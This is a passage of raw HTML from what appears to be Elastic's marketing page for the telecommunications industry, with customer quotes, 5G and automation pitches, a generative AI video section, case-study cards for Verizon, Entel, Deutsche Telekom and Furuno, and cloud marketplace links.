flex-wrap"><div class="jsx-1955866259 title-wrapper"><h6 tag="H6" id="" class="jsx-1955866259 "><span class="QuotesCarousel_quoteHyphen__NF5TT">Oscar Narváez<!-- -->, <!-- -->Tools &amp; Analytic Monitoring Team Leader, Entel</span></h6></div></div><div class="mb-2 pt-4 QuotesCarousel_quotesCta__bkVZc"></div></div></div></div></div><div data-index="2" class="slick-slide" tabindex="-1" aria-hidden="true" style="outline:none;width:11.11111111111111%;position:relative;left:-22px;opacity:0;transition:opacity 500ms ease, visibility 500ms ease"><div><div tabindex="-1" style="width:100%;display:inline-block"><div><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/bltd5a35b9717d7a1af/5e05050d12af1140b8e779c9/icon-quote-64-pink.svg" alt="icon-quote" class="QuotesCarousel_logo64__pmSml"/><div class="QuotesCarousel_quoteContent__Wc_px"><p class="QuotesCarousel_paragraph__eE7i0">We are now able to explore our data in new and different ways, within one scalable platform and move to a model where we’re innovating and optimizing rather than monitoring and maintaining.</p></div><div class="mt-6 d-flex justify-content-center flex-wrap"><div class="jsx-1955866259 title-wrapper"><h6 tag="H6" id="" class="jsx-1955866259 "><span class="QuotesCarousel_quoteHyphen__NF5TT">Álvaro Aldana<!-- -->, <!-- -->Global Video Monitoring Technical Lead, Telefónica</span></h6></div></div><div class="mb-2 pt-4 QuotesCarousel_quotesCta__bkVZc"></div></div></div></div></div><div data-index="3" class="slick-slide" tabindex="-1" aria-hidden="true" style="outline:none;width:11.11111111111111%;position:relative;left:-33px;opacity:0;transition:opacity 500ms ease, visibility 500ms ease"><div><div tabindex="-1" style="width:100%;display:inline-block"><div><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/bltd5a35b9717d7a1af/5e05050d12af1140b8e779c9/icon-quote-64-pink.svg" alt="icon-quote" class="QuotesCarousel_logo64__pmSml"/><div class="QuotesCarousel_quoteContent__Wc_px"><p class="QuotesCarousel_paragraph__eE7i0">It is not every day that sales and marketing says, ‘Give the folks in IT whatever they need’. But, with the Elastic system we gave them, that’s exactly what happened for us.</p></div><div class="mt-6 d-flex justify-content-center flex-wrap"><div class="jsx-1955866259 title-wrapper"><h6 tag="H6" id="" class="jsx-1955866259 "><span class="QuotesCarousel_quoteHyphen__NF5TT">Jeremy Foran<!-- -->, <!-- -->Technology Specialist, BAI Communications</span></h6></div></div><div class="mb-2 pt-4 QuotesCarousel_quotesCta__bkVZc"></div></div></div></div></div></div></div><button type="button" data-role="none" class="slick-arrow slick-next" style="display:block"> <!-- -->Next</button><div style="padding:56px 0" class="slick-dots"><ul style="margin:0"> <li class="slick-active"><button>1</button></li><li class=""><button>2</button></li><li class=""><button>3</button></li><li class=""><button>4</button></li> </ul></div></div></div></div></div></div></section><div class="layout layout-07"></div><section aria-labelledby="monetize-5g" data-component-theme="" class="jsx-3636536621 TextImageVideo_textImageVideo__UWP8e module-gb"><div class="TextImageVideo_contentRow__4wUqk" data-component-theme=""><div class="container"><div class="row d-flex justify-content-between reverseLayout"><div class="content col-12 col-md-5 col-sm-6 align-self-center position-relative TextImageVideo_textContainer__4pma1"><div class="jsx-1955866259 title-wrapper"><h2 tag="H2" id="monetize-5g" class="jsx-1955866259 title h4">Monetize 5G</h2></div><div class="TextImageVideo_imageContent__Bu10U paragraph-medium"><p>Get more out of data by breaking down silos to deliver telco-as-a-service. Fine-tune network and cloud parameters to deliver guaranteed quality of service for network slicing. </p></div></div><div class="TextImageVideo_assetWrapper__FPCDO col-12 col-sm-6"><div class="TextImageVideo_asset__Snh_h"><div class="jsx-1653982606 image"><figure class="jsx-1653982606"><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt2036df43444fee8c/627c5c017198441d81b4dff0/illustration-currency-value-scale-1216x860.png" alt="Illustration" class="jsx-1653982606 TextImageVideo_imageVideo__uZ4gh img-fluid"/></figure></div></div></div></div></div></div><div class="TextImageVideo_contentRow__4wUqk mt-10" data-component-theme=""><div class="container"><div class="row d-flex justify-content-between reverseLayout"><div class="content col-12 col-md-5 col-sm-6 align-self-center position-relative TextImageVideo_textContainer__4pma1"><div class="jsx-1955866259 title-wrapper"><h2 tag="H2" id="automate-workflows" class="jsx-1955866259 title h4">Automate workflows</h2></div><div class="TextImageVideo_imageContent__Bu10U paragraph-medium"><p>Automate workflows in business and operational support systems. Implement ML-based rules for the DevSecOps continuum, even as data and software continue to grow. </p></div></div><div class="TextImageVideo_assetWrapper__FPCDO col-12 col-sm-6"><div class="TextImageVideo_asset__Snh_h"><div class="jsx-1653982606 image"><figure class="jsx-1653982606"><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blted380dfa0efceadf/627c5c3b220ab5285f52d685/illustration-dev-sec-ops-cloud-automations-1216x840.png" alt="Illustration" class="jsx-1653982606 TextImageVideo_imageVideo__uZ4gh img-fluid"/></figure></div></div></div></div></div></div><div class="TextImageVideo_contentRow__4wUqk mt-10" data-component-theme=""><div class="container"><div class="row d-flex justify-content-between reverseLayout"><div class="content col-12 col-md-5 col-sm-6 align-self-center position-relative TextImageVideo_textContainer__4pma1"><div class="jsx-1955866259 title-wrapper"><h2 tag="H2" id="protect-your-brand" class="jsx-1955866259 title h4">Protect your brand</h2></div><div class="TextImageVideo_imageContent__Bu10U paragraph-medium"><p>Integrate seamlessly with legacy and next-generation solutions to elevate the collective IQ of your team. Use a single source of truth throughout the organization. </p></div></div><div class="TextImageVideo_assetWrapper__FPCDO col-12 col-sm-6"><div class="TextImageVideo_asset__Snh_h"><div class="jsx-1653982606 image"><figure class="jsx-1653982606"><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt648ad5b483eade22/627c5c878e09542a15b92080/illustration-site-search-heart-magnifying-glass-light-1216x840.png" alt="Illustration" class="jsx-1653982606 TextImageVideo_imageVideo__uZ4gh img-fluid"/></figure></div></div></div></div></div></div></section><div class="layout layout-07"></div><section aria-labelledby="the-power-of-generative-ai-for-telco" data-component-theme="" class="jsx-3636536621 image-video module-gb"><div class="jsx-1383953900 title-text-one-column"><div class="jsx-1383953900 container"><div class="col-md-8 offset-md-2 text-center"><h2 class="topic-heading">Generative AI telecommunications use cases</h2><div class="jsx-1955866259 title-wrapper"><h2 tag="H2" id="the-power-of-generative-ai-for-telco" class="jsx-1955866259 h3">The power of generative AI for telco</h2></div><div class="title-text-desc paragraph-large"><p>Generative AI has the ability to transform the telecommunications industry. Watch this video series to learn about generative AI telecommunications use cases, the value this new technology can bring to customers and employees, and key considerations for getting started. Keep watching to see an example generative AI demo for telecommunications employees.</p></div><div class="title-text-footer"><div class="cta-group align-items-center justify-content-center text-center"><div><a class="button mt-4 btn-tertiary" href="/contact?baymax=rtp&amp;rogue=eswt-1165-b#sales"><span class="jsx-1596590093 btn-copy">Contact us</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div></div></div><div class="layout layout-05"></div><div class="container"><div class="row"><div class="col-12 col-md-10 offset-md-1 mx-auto text-center"><div class="jsx-2477493165 video"><div class="jsx-2477493165 shadow-light"><figure class="jsx-89852744 vidyard-embed "><img src="https://play.vidyard.com/UgRhyVZFAhbbcahHa2JbyA.jpg" data-uuid="UgRhyVZFAhbbcahHa2JbyA" data-v="4" data-chapter="1" data-type="inline" data-referring_url="" disablepictureinpicture="" data-autoplay="0" data-hidden_controls="0" data-muted="0" data-loop="0" data-disable_analytics="0" alt="Video thumbnail" class="jsx-89852744 vidyard-player-embed "/></figure></div></div></div></div></div></section><div class="layout layout-07"></div><div style="border-radius:" data-component-theme="" class="jsx-2381115616 card-deck-container"><div class="jsx-1383953900 title-text-one-column"><div class="jsx-1383953900 container"><div class="col-md-8 offset-md-2 text-center"><div class="jsx-1955866259 title-wrapper"><h2 id="customer-case-studies" class="jsx-1955866259 h3">Customer case studies</h2></div><div class="title-text-desc paragraph-large"><p>Elastic&#x27;s search platform for communications service providers (CSPs) enables customers to cut costs, improve customer satisfaction, and more. </p></div><div class="title-text-footer"><div class="cta-group align-items-center justify-content-center text-center"><div><a class="button mt-4 btn-tertiary" href="/customers/success-stories?industry=telecommunications"><span class="jsx-1596590093 btn-copy">See all customer stories</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div></div></div><div class="jsx-2381115616 container"><div class="layout layout-05"></div><ul class="card-deck-items card-grid card-grid-4x1" data-component-theme="light"><li class="jsx-1443386464 card-list"><div style="border-radius:10px" class="jsx-1443386464 card-wrapper"><div style="border-radius:10px" data-component-theme="light" class="jsx-1443386464 card-container card card-outline-none shadow-light card-image-center card-large-padding card-content-center"><div class="card-border card-border-top bg-elastic-blue"></div><div class="card-top"><div><div class="card-topic-heading"><h2 class="topic-heading">Customer spotlight</h2></div></div><div><div class="card-image"><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2662337af018e508/5ea9e29503f6e72ff388c17c/logoparade-verizon.svg" class="img-fluid logo" alt=""/></div></div><div><div class="card-paragraph"><p>Cutting costs and increasing customer satisfaction. Reduced MTTR by 10x. </p></div></div></div><div class="card-footer"><div><div class="inline-flex-align-items-baseline justify-content-center text-center"><a class="button stretched-link btn-tertiary" href="/customers/verizon-wireless"><span class="jsx-1596590093 btn-copy">Learn more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div></div></li><li class="jsx-1443386464 card-list"><div style="border-radius:10px" class="jsx-1443386464 card-wrapper"><div style="border-radius:10px" data-component-theme="light" class="jsx-1443386464 card-container card card-outline-none shadow-light card-image-center card-large-padding card-content-center"><div class="card-border card-border-top bg-elastic-blue"></div><div class="card-top"><div><div class="card-topic-heading"><h2 class="topic-heading">Customer spotlight</h2></div></div><div><div class="card-image"><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4a293e73e2cfb29d/5eb44f9ec83f71298799eee5/logoparade-entel.svg" class="img-fluid logo" alt=""/></div></div><div><div class="card-paragraph"><p>Future-proofing the business. Reduced MTTR by 80%. </p></div></div></div><div class="card-footer"><div><div class="inline-flex-align-items-baseline justify-content-center text-center"><a class="button stretched-link btn-tertiary" href="/customers/entel"><span class="jsx-1596590093 btn-copy">Learn more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div></div></li><li class="jsx-1443386464 card-list"><div style="border-radius:10px" class="jsx-1443386464 card-wrapper"><div style="border-radius:10px" data-component-theme="light" class="jsx-1443386464 card-container card card-outline-none shadow-light card-image-center card-large-padding card-content-center"><div class="card-border card-border-top bg-elastic-blue"></div><div class="card-top"><div><div class="card-topic-heading"><h2 class="topic-heading">Customer spotlight</h2></div></div><div><div class="card-image"><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf190f51b9f6622ca/617c2fc1a2b4ac1067d76acc/logoparade-deutsche-telekom.png" class="img-fluid logo" alt=""/></div></div><div><div class="card-paragraph"><p>Monitoring voice data traffic. Unified fault, performance, and predictive management. </p></div></div></div><div class="card-footer"><div><div class="inline-flex-align-items-baseline justify-content-center text-center"><a class="button stretched-link btn-tertiary" href="/blog/telecommunications-observability-elastic-stack-monitoring-voice-traffic-data"><span class="jsx-1596590093 btn-copy">Learn more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div></div></li><li class="jsx-1443386464 card-list"><div style="border-radius:10px" class="jsx-1443386464 card-wrapper"><div style="border-radius:10px" data-component-theme="light" class="jsx-1443386464 card-container card card-outline-none shadow-light card-image-center card-large-padding card-content-center"><div class="card-border card-border-top bg-elastic-blue"></div><div class="card-top"><div><div class="card-topic-heading"><h2 class="topic-heading">Customer spotlight</h2></div></div><div><div class="card-image"><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc37e388c34332f02/5ef387f9704e3d1cf536f9f6/logoparade-furuno.svg" class="img-fluid logo" alt=""/></div></div><div><div class="card-paragraph"><p>Optimizing satellite communications at sea. Improved mean time to knowledge by 94%. </p></div></div></div><div class="card-footer"><div><div class="inline-flex-align-items-baseline justify-content-center text-center"><a class="button stretched-link btn-tertiary" href="/customers/furuno"><span class="jsx-1596590093 btn-copy">Learn more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div></div></li></ul></div></div><div class="layout layout-07"></div><section aria-labelledby="drive-customer-centricity" data-component-theme="" class="jsx-3636536621 carousel carousel-container carousel-two-column"><div class="jsx-1383953900 title-text-one-column"><div class="jsx-1383953900 container"><div class="col-md-8 offset-md-2 text-center"><div class="jsx-1955866259 title-wrapper"><h2 tag="H2" id="drive-customer-centricity" class="jsx-1955866259 h3">Drive customer centricity</h2></div><div class="title-text-desc paragraph-large"><p>Implement proactive customer service. Answer questions in real -time. Build customer trust through secure operations. </p></div></div></div></div><div class="layout layout-05"></div><div class="jsx-887545163 container"><div class="carousel-two-column__tab-labels-left-accordion row" data-rttabs="true"><div class="jsx-887545163 carousel-tabs col-12 col-lg-4"><ul class="react-tabs__tab-list" role="tablist"><li class="react-tabs__tab react-tabs__tab--selected" role="tab" id="react-tabs-74" aria-selected="true" aria-disabled="false" aria-controls="react-tabs-75" tabindex="0" data-rttab="true"><div class="jsx-887545163 carousel-content"><div class="jsx-887545163 carousel-heading"><a class="jsx-887545163 stretched-link"></a><div class="jsx-887545163 heading">Provide a zero-touch experience</div><div class="jsx-887545163 arrow down"></div></div><div data-selectab="0" class="jsx-887545163 carousel-body show"><div class="jsx-887545163 carousel-text"><div class="jsx-887545163 paragraph-medium"><p>Use ML, vector search, and NLP for predictive and proactive analytics, eliminating any friction during the customer journey. See how to reduce churn and maximize customer lifetime value.</p></div></div><div class="jsx-887545163 d-lg-none carousel-asset-container carousel-asset-video"><figure class="jsx-89852744 vidyard-embed shadow-light "><img src="https://play.vidyard.com/i4ZV9akMs7rjoCyWaDtffj.jpg" data-uuid="i4ZV9akMs7rjoCyWaDtffj" data-v="4" data-chapter="1" data-type="inline" data-referring_url="" disablepictureinpicture="" data-autoplay="0" data-hidden_controls="1" data-muted="1" data-loop="1" data-disable_analytics="1" alt="Video thumbnail" class="jsx-89852744 vidyard-player-embed "/></figure></div></div></div></li><li class="react-tabs__tab" role="tab" id="react-tabs-76" aria-selected="false" aria-disabled="false" aria-controls="react-tabs-77" data-rttab="true"><div class="jsx-887545163 carousel-content"><div class="jsx-887545163 carousel-heading"><a class="jsx-887545163 stretched-link"></a><div class="jsx-887545163 heading">Improve service quality</div><div class="jsx-887545163 arrow down"></div></div><div data-selectab="1" class="jsx-887545163 carousel-body hidden"><div class="jsx-887545163 carousel-text"><div class="jsx-887545163 paragraph-medium"><p>Map network performance metrics and system KPIs to customer behavior. Learn how to correlate all data sources to see how service quality impacts revenue.</p></div></div><div class="jsx-887545163 d-lg-none carousel-asset-container carousel-asset-video"><figure class="jsx-89852744 vidyard-embed shadow-light "><img src="https://play.vidyard.com/QjtXkVijeo3xuuEK163fm5.jpg" data-uuid="QjtXkVijeo3xuuEK163fm5" data-v="4" data-chapter="1" data-type="inline" data-referring_url="" disablepictureinpicture="" data-autoplay="0" data-hidden_controls="1" data-muted="1" data-loop="1" data-disable_analytics="1" alt="Video thumbnail" class="jsx-89852744 vidyard-player-embed "/></figure></div></div></div></li><li class="react-tabs__tab" role="tab" id="react-tabs-78" aria-selected="false" aria-disabled="false" aria-controls="react-tabs-79" data-rttab="true"><div class="jsx-887545163 carousel-content"><div class="jsx-887545163 carousel-heading"><a class="jsx-887545163 stretched-link"></a><div class="jsx-887545163 heading">Enable real-time situational awareness</div><div class="jsx-887545163 arrow down"></div></div><div data-selectab="2" class="jsx-887545163 carousel-body hidden"><div class="jsx-887545163 carousel-text"><div class="jsx-887545163 paragraph-medium"><p>Reduce MTTR with relevant real-time insights. Find out how to associate alerts and performance metrics to achieve business objectives.</p></div></div><div class="jsx-887545163 d-lg-none carousel-asset-container carousel-asset-video"><figure class="jsx-89852744 vidyard-embed shadow-light "><img src="https://play.vidyard.com/tjnE7MReeY843DLoeteWiM.jpg" data-uuid="tjnE7MReeY843DLoeteWiM" data-v="4" data-chapter="1" data-type="inline" data-referring_url="" disablepictureinpicture="" data-autoplay="0" data-hidden_controls="1" data-muted="1" data-loop="1" data-disable_analytics="1" alt="Video thumbnail" class="jsx-89852744 vidyard-player-embed "/></figure></div></div></div></li></ul></div><div class="jsx-887545163 carousel-asset-container col-12 col-lg-8 d-none d-lg-block"><div class="carousel-asset carousel-asset-video react-tabs__tab-panel--selected" role="tabpanel" id="react-tabs-75" aria-labelledby="react-tabs-74"><figure class="jsx-89852744 vidyard-embed shadow-light "><img src="https://play.vidyard.com/i4ZV9akMs7rjoCyWaDtffj.jpg" data-uuid="i4ZV9akMs7rjoCyWaDtffj" data-v="4" data-chapter="1" data-type="inline" data-referring_url="" disablepictureinpicture="" data-autoplay="0" data-hidden_controls="1" data-muted="1" data-loop="1" data-disable_analytics="1" alt="Video thumbnail" class="jsx-89852744 vidyard-player-embed "/></figure></div><div class="carousel-asset carousel-asset-video" role="tabpanel" id="react-tabs-77" aria-labelledby="react-tabs-76"></div><div class="carousel-asset carousel-asset-video" role="tabpanel" id="react-tabs-79" aria-labelledby="react-tabs-78"></div></div></div></div></section><div class="layout layout-07"></div><section aria-labelledby="data-driven-innovations-for-sustainable-networks" data-component-theme="" class="jsx-3636536621 TextImageVideo_textImageVideo__UWP8e module-gb"><div class="TextImageVideo_contentRow__4wUqk" data-component-theme=""><div class="container"><div class="row d-flex justify-content-between reverseLayout"><div class="content col-12 col-md-5 col-sm-6 align-self-center position-relative TextImageVideo_textContainer__4pma1"><div class="jsx-1955866259 title-wrapper"><h2 tag="H2" id="data-driven-innovations-for-sustainable-networks" class="jsx-1955866259 title h4">Data-driven innovations for sustainable networks</h2></div><div class="TextImageVideo_imageContent__Bu10U paragraph-medium"><p>Achieve your sustainability goals with data-led insights into network performance, capacity demand, power consumption, resource allocation, vendor availability, and more. </p></div></div><div class="TextImageVideo_assetWrapper__FPCDO col-12 col-sm-6"><div class="TextImageVideo_asset__Snh_h"><div class="jsx-1653982606 image"><figure class="jsx-1653982606"><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt98b4abc7d98a433c/6181816f7a41520f2aabcbc0/hero-hbp-telco-white-bg-2x.png" alt="Illustration" class="jsx-1653982606 TextImageVideo_imageVideo__uZ4gh img-fluid"/></figure></div></div></div></div></div></div></section><div class="layout layout-07"></div><div style="border-radius:" data-component-theme="" class="jsx-2381115616 illustration-icon-grid-container"><div class="jsx-1383953900 title-text-one-column"><div class="jsx-1383953900 container"><div class="col-md-8 offset-md-2 text-center"><div class="jsx-1955866259 title-wrapper"><h2 tag="H2" id="enhancing-connectivity-experiences-in-related-industries" class="jsx-1955866259 h3">Enhancing connectivity experiences in related industries</h2></div><div class="title-text-desc paragraph-large"><p>Expand to new verticals and industries with an intelligent data-led approach. Build partnerships to bring new capabilities that can drive innovation in connectivity-based services across industries.</p></div><div class="title-text-footer"><div class="cta-group align-items-center justify-content-center text-center"><div><a class="button mt-4 btn-tertiary" href="/industries/telecommunications/enable-real-time-insights-at-telco-scale"><span class="jsx-1596590093 btn-copy">Download the guide</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div></div></div><div class="jsx-2381115616 container"><div class="layout layout-05"></div><ul class="illustration-icon-grid-items illustration-icon-grid-3x1"><li class="jsx-802606770 illustration-icon-grid-item one-column grid-image-left"><div class="illustration-icon-grid-item-main"><div class="illustration-icon-grid-item-top grid-image-left"><div><div class="grid-image"><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7f1f4dcf2f803a4b/649361202c4f8721501b2910/illustration-search-analytics-128.svg" class="image-xsmall" alt=""/></div></div><div></div><div></div><div></div></div><div class="illustration-icon-grid-item-content"><div></div><div><div class="jsx-1955866259 title-wrapper"><h3 tag="H3" id="automotive" class="jsx-1955866259 h5">Automotive</h3></div></div><div><div class="paragraph paragraph-medium"><p>Learn how Elastic is ensuring a secured connected car experience.</p></div></div><div></div></div></div><div class="illustration-icon-grid-item-footer"><div></div><div></div><div></div><div><div class="d-flex flex-column justify-content-start text-start"><a class="button btn-tertiary" href="/blog/elastic-announces-tisax-certification-security-connected-vehicles"><span class="jsx-1596590093 btn-copy">Learn more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></li><li class="jsx-802606770 illustration-icon-grid-item one-column grid-image-left"><div class="illustration-icon-grid-item-main"><div class="illustration-icon-grid-item-top grid-image-left"><div><div class="grid-image"><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt10dd644478e9944f/648bcd6dcb6702268b15831d/illustration-task-automation-128.svg" class="image-xsmall" alt=""/></div></div><div></div><div></div><div></div></div><div class="illustration-icon-grid-item-content"><div></div><div><div class="jsx-1955866259 title-wrapper"><h3 tag="H3" id="manufacturing" class="jsx-1955866259 h5">Manufacturing</h3></div></div><div><div class="paragraph paragraph-medium"><p>Find out how Elastic is helping industries with digital transformation.</p></div></div><div></div></div></div><div class="illustration-icon-grid-item-footer"><div></div><div></div><div></div><div><div class="d-flex flex-column justify-content-start text-start"><a class="button btn-tertiary" href="/industries/manufacturing"><span class="jsx-1596590093 btn-copy">Learn more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></li><li class="jsx-802606770 illustration-icon-grid-item one-column grid-image-left"><div class="illustration-icon-grid-item-main"><div class="illustration-icon-grid-item-top grid-image-left"><div><div class="grid-image"><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt70efe238ed6f0f32/648bcbfc48a8ff0b3a476e4f/illustration-shopping-cart-128.svg" class="image-xsmall" alt=""/></div></div><div></div><div></div><div></div></div><div class="illustration-icon-grid-item-content"><div></div><div><div class="jsx-1955866259 title-wrapper"><h3 tag="H3" id="retail" class="jsx-1955866259 h5">Retail</h3></div></div><div><div class="paragraph paragraph-medium"><p>Discover how retail giants are driving brand loyalty using Elastic.</p></div></div><div></div></div></div><div class="illustration-icon-grid-item-footer"><div></div><div></div><div></div><div><div class="d-flex flex-column justify-content-start text-start"><a class="button btn-tertiary" href="/industries/retail-ecommerce"><span class="jsx-1596590093 btn-copy">Learn more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></li></ul></div></div><div class="layout layout-07"></div><section aria-labelledby="elastic-cloud-your-way" data-component-theme="" id="footer-cta" class="jsx-3636536621 FooterCTA_footerCta__ET7NV"><div class="FooterCTA_footerCtaWrapper__LpSzU py-9 container-border-radius-top bg-dark-ink" data-component-theme="dark"><div class="container"><div class="row"><div class="FooterCTA_titleTextSection__3NglX col-md-8 offset-md-2 text-center"><div class="jsx-1955866259 title-wrapper"><h3 tag="H3" id="elastic-cloud-your-way" class="jsx-1955866259 ">Elastic Cloud, your way</h3></div><div class="paragraph-medium"><p>Purchase through your marketplace of choice to consolidate your cloud bill and leverage your existing cloud spending commitments. See all the regions we support on our <a href="/cloud/regions">regions page</a>. </p></div><div class="FooterCTA_ctaGroup___3dhk"></div></div></div></div><section class="FooterCTACards_footerCtaCards__69efo"><div class="container"><div class="FooterCTACards_cardSection__K9E_m mt-8" style="grid-template-columns:repeat(4, 1fr)"><div class="FooterCTACards_cardContent__6vOAB"><div class="FooterCTACards_cardTitle__MVQki"><div class="jsx-1955866259 title-wrapper"><h3 tag="H3" id="aws-marketplace" class="jsx-1955866259 h5">AWS Marketplace</h3></div></div><div class="FooterCTACards_cardBody__mgdS5 paragraph-medium"><p>Elastic Cloud on AWS gives users the ability to run pre-built SaaS solutions for search, observability, and security. Start a free trial.</p></div><div class="mt-6 FooterCTACards_ctaArrow__2NqlT"><a href="https://aws.amazon.com/marketplace/pp/Elasticsearch-Inc-Elasticsearch-Service-on-Elastic/B01N6YCISK" class="stretched-link"><img class="img-fluid" src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt5a7c7b570189ea07/5f2550947f3b7908db02fc89/arrow-white.svg" alt="arrow-white"/></a></div></div><div class="FooterCTACards_cardContent__6vOAB"><div class="FooterCTACards_cardTitle__MVQki"><div class="jsx-1955866259 title-wrapper"><h3 tag="H3" id="azure-marketplace" class="jsx-1955866259 h5">Azure Marketplace</h3></div></div><div class="FooterCTACards_cardBody__mgdS5 paragraph-medium"><p>Elastic on Microsoft Azure gives you the ability to deploy Elasticsearch directly within the Azure portal. </p></div><div class="mt-6 FooterCTACards_ctaArrow__2NqlT"><a href="https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.ec-azure-pp?tab=Overview" class="stretched-link"><img class="img-fluid" src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt5a7c7b570189ea07/5f2550947f3b7908db02fc89/arrow-white.svg" alt="arrow-white"/></a></div></div><div class="FooterCTACards_cardContent__6vOAB"><div class="FooterCTACards_cardTitle__MVQki"><div class="jsx-1955866259 title-wrapper"><h3 tag="H3" id="google-marketplace" class="jsx-1955866259 h5">Google Marketplace</h3></div></div><div class="FooterCTACards_cardBody__mgdS5 paragraph-medium"><p>Deploy on Google Cloud so you can derive powerful, real-time insights from your data in minutes. </p></div><div class="mt-6 FooterCTACards_ctaArrow__2NqlT"><a href="https://console.cloud.google.com/marketplace/details/endpoints/elasticsearch-service.gcpmarketplace.elastic.co" class="stretched-link"><img class="img-fluid" src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt5a7c7b570189ea07/5f2550947f3b7908db02fc89/arrow-white.svg" alt="arrow-white"/></a></div></div><div class="FooterCTACards_cardContent__6vOAB"><div class="FooterCTACards_cardTitle__MVQki"><div class="jsx-1955866259 title-wrapper"><h3 tag="H3" id="elastic-cloud-trial" class="jsx-1955866259 h5">Elastic Cloud trial</h3></div></div><div class="FooterCTACards_cardBody__mgdS5 paragraph-medium"><p>We handle the maintenance and upkeep, so you can focus on gaining the insights that help you run your business. </p></div><div class="mt-6 FooterCTACards_ctaArrow__2NqlT"><a href="https://cloud.elastic.co/registration" class="stretched-link"><img class="img-fluid" src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt5a7c7b570189ea07/5f2550947f3b7908db02fc89/arrow-white.svg" alt="arrow-white"/></a></div></div></div></div></section></div></section></div></main><div id="elastic-footer"></div><footer class="Footer_footer__Q5T55" aria-label="footer"><div class="Footer_footerWrapper__yhyD_ bg-dark-ink" data-component-theme="dark"><div class="container"><div class="row Footer_footerTop__2eyMt"><div class="Footer_footerNav__LFrAZ"><div><div><div class="Footer_logo__EaWBg"><a href="/"><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf8467a95eaa27e4a/6638d7da0d02e4e98155aaa3/logo-tagline_secondary_all_white-177.svg" alt="Elastic home"/></a></div></div><div><div class="Footer_followUs__Y4Nvp"><div><h2 class="topic-heading">Follow us</h2></div><ul class="Footer_socialIconList__eaA5a"><li class="LinkedIn"><a id="footer_linkedin" href="https://www.linkedin.com/company/elastic-co"><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blte7cfb1a091901ce1/5eb00c925751b2150e57a9d6/footer-icon-linkedin.svg" alt="Elastic&#x27;s LinkedIn page"/></a></li><li class="YouTube"><a id="footer_youtube" href="https://www.youtube.com/user/elasticsearch"><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt7c28b18be98b1af8/5eb00ca908d37e6d82ef7655/footer-icon-youtube.svg" alt="Elastic&#x27;s YouTube page"/></a></li><li class="Facebook"><a id="footer_facebook" href="https://www.facebook.com/elastic.co"><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt75566c5278ad68da/5eb00c59d238e314f259fbea/footer-icon-facebook.svg" alt="Elastic&#x27;s Facebook page"/></a></li><li class="Twitter"><a id="footer_twitter" href="https://www.twitter.com/elastic"><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt341fed86979a9fbb/5eb00c76b8a6356e4ddc1180/footer-icon-twitter.svg" alt="Elastic&#x27;s Twitter page"/></a></li><li class="GitHub"><a id="" href="https://github.com/elastic"><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt6ef5841a45696d80/64ca2a6fc530871313bc3822/icon-footer-github.svg" alt="Elastic&#x27;s GitHub page"/></a></li></ul></div></div></div><div class="Footer_rightSide__zawr1"><ul class="Footer_desktopNav__gXs3Z"><li><h2 class="topic-heading">About us</h2><div class="Footer_innerNav__tQcnP"><a href="/about/">About Elastic</a><a href="/about/leadership">Leadership</a><a href="/careers/diversity-and-inclusion">DE&amp;I</a><a href="/blog">Blog</a><a href="/about/press">Newsroom</a></div></li><li><h2 class="topic-heading">Join us</h2><div class="Footer_innerNav__tQcnP"><a href="/careers">Careers</a><a href="https://jobs.elastic.co/#/">Career portal</a><a href="/careers/how-we-hire">How we hire</a></div></li></ul><ul class="Footer_desktopNav__gXs3Z"><li><h2 class="topic-heading">Partners</h2><div class="Footer_innerNav__tQcnP"><a href="https://partners.elastic.co/findapartner/">Find a partner</a><a href="https://login.elastic.co/login/partner">Partner login</a><a href="https://partners.elastic.co/English/register_email.aspx">Request access</a><a href="/partners/become-a-partner">Become a partner</a></div></li><li><h2 class="topic-heading">Trust &amp; Security</h2><div class="Footer_innerNav__tQcnP"><a href="/trust">Trust center</a><a 